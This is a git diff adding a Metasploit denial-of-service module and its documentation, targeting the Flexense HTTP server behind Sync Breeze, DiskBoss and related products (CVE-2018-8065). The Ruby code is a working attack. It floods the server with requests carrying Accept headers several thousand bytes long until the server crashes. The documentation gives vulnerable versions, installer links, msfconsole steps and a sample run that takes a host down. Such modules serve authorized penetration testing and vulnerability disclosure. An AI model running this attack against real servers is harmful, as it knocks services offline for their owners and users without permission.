diff --git a/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md new file mode 100644 index 0000000000..d930453a26 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md @@ -0,0 +1,67 @@ +## Description +This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger +a write access memory vialation via rapidly sending HTTP requests with large HTTP header values. + + +## Vulnerable Application +According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24 +Following list of softwares are vulnerable to Denial Of Service. +read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065 + + +DiskBoss Enterprise <= v9.0.18 +Sync Breeze Enterprise <= v10.6.24 +Disk Pulse Enterprise <= v10.6.24 +Disk Savvy Enterprise <= v10.6.24 +Dup Scout Enterprise <= v10.6.24 +VX Search Enterprise <= v10.6.24 + + +**Vulnerable Application Link** +http://www.diskboss.com/downloads.html +http://www.syncbreeze.com/downloads.html +http://www.diskpulse.com/downloads.html +http://www.disksavvy.com/downloads.html +http://www.dupscout.com/downloads.html + + +## Vulnerable Application Installation Setup. +All Flexense applications that are listed above can be installed by following these steps. + +Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe``` + +**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard** + +After the installation navigate to: ```Options->Server``` + +Check the box saying: ```Enable web server on port:...``` + +## Verification Steps + + 1. Install the application + 2. Start msfconsole + 3. Do: `use auxiliary/dos/http/flexense_http_server_dos` + 4. Do: `set rport ` + 5. Do: `set rhost ` + 6. Do: `check` +``` +[+] 192.168.1.20:80 The target is vulnerable. +``` + 7. Do: `run` + 8. Web server will crash after 200-1000 request depending on the OS version and system memory. + +## Scenarios +**TESTED AGAINST WINDOWS 7/10** +``` +msf5 > use auxiliary/dos/http/flexense_http_server_dos +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27 +rhost => 192.168.1.27 +msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80 +rport => 80 +msf5 auxiliary(dos/http/flexense_http_server_dos) > run + +[*] 192.168.1.20:80 - Triggering the vulnerability +[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down ! +[*] Auxiliary module execution completed + +``` diff --git a/modules/auxiliary/dos/http/flexense_http_server_dos.rb b/modules/auxiliary/dos/http/flexense_http_server_dos.rb new file mode 100644 index 0000000000..dd77806d27 --- /dev/null +++ b/modules/auxiliary/dos/http/flexense_http_server_dos.rb @@ -0,0 +1,91 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Dos + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Flexense HTTP Server Denial Of Service', + 'Description' => %q{ + This module triggers a Denial of Service vulnerability in the Flexense HTTP server. + Vulnerability caused by a user mode write access memory violation and can be triggered with + rapidly sending variety of HTTP requests with long HTTP header values. + + Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable. + }, + 'Author' => [ 'Ege Balci ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-8065'], + [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ], + ], + 'DisclosureDate' => 'Mar 09 2018')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]), + OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ]) + ]) + + end + + def check + begin + connect + sock.put("GET / HTTP/1.0\r\n\r\n") + res = sock.get + if res and res.include? 'Flexense HTTP Server v10.6.24' + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + rescue Rex::ConnectionRefused + print_error("Target refused the connection") + Exploit::CheckCode::Unknown + rescue + print_error("Target did not respond to HTTP request") + Exploit::CheckCode::Unknown + end + end + + def run + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + + size = datastore['PacketSize'].to_i + print_status("Starting with packets of #{size}-byte strings") + + count = 0 + loop do + payload = "" + payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n" + payload << "Host: 127.0.0.1\r\n" + payload << "Accept: "+('A' * size)+"\r\n" + payload << "\r\n\r\n" + begin + connect + sock.put(payload) + disconnect + count += 1 + break if count==datastore['PacketCount'] + rescue ::Rex::InvalidDestination + print_error('Invalid destination! Continuing...') + rescue ::Rex::ConnectionTimeout + print_error('Connection timeout! Continuing...') + rescue ::Errno::ECONNRESET + print_error('Connection reset! Continuing...') + rescue ::Rex::ConnectionRefused + print_good("DoS successful after #{count} packets with #{size}-byte headers") + return true + end + end + print_error("DoS failed after #{count} packets of #{size}-byte strings") + end +end